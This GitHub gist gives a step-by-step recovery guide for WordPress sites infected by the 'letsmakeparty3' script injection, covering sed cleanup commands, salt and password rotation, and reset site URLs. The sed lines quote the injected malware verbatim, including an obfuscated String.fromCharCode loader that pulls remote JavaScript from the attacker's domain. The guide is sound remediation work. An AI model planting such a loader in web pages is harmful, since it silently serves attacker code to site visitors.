Last active
December 12, 2020 18:33
-
-
Save fabmars/b5150358da81265e9d94bd9fbd6382c7 to your computer and use it in GitHub Desktop.
fix for letsmakeparty3 attack for those of you who have no backup !!!!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b | |
| Here's a how-to restore the site functionality (but not plug the hole wherever it is) | |
| 1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns. | |
| 2) fix altered files | |
| find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' | |
| find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();</script>++g" | |
| find ./www -type f -print0 | xargs -0 sed -i "s+Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0].appendChild(elem);})();++g" | |
| 3) upload files overwriting if size is different (available upload setting in FileZilla) | |
| and check rights are back to 644 (probably 604 though) on those files | |
| 4) change all hashes in wp-config.php using https://api.wordpress.org/secret-key/1.1/salt/ | |
| 5) change password in the DB: `SET PASSWORD = PASSWORD('mynewpassword');` and put the same password in wp-config.php too of course. | |
| 6) update <prefix>_options table and reset 'siteurl' and 'home' props to the original site's url (eg: https://www.mywordpressdomain.com ) as they certainly also contain a link to the malicious site | |
| 7) Now you can access your WP again. Log in the wp admin console and change your password | |
| 8) Remove woocommerce and all unneeded plugins | |
| 9) Remove ability to post comments | |
| 10) Now let's find out how the joker entered the place...TBC |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment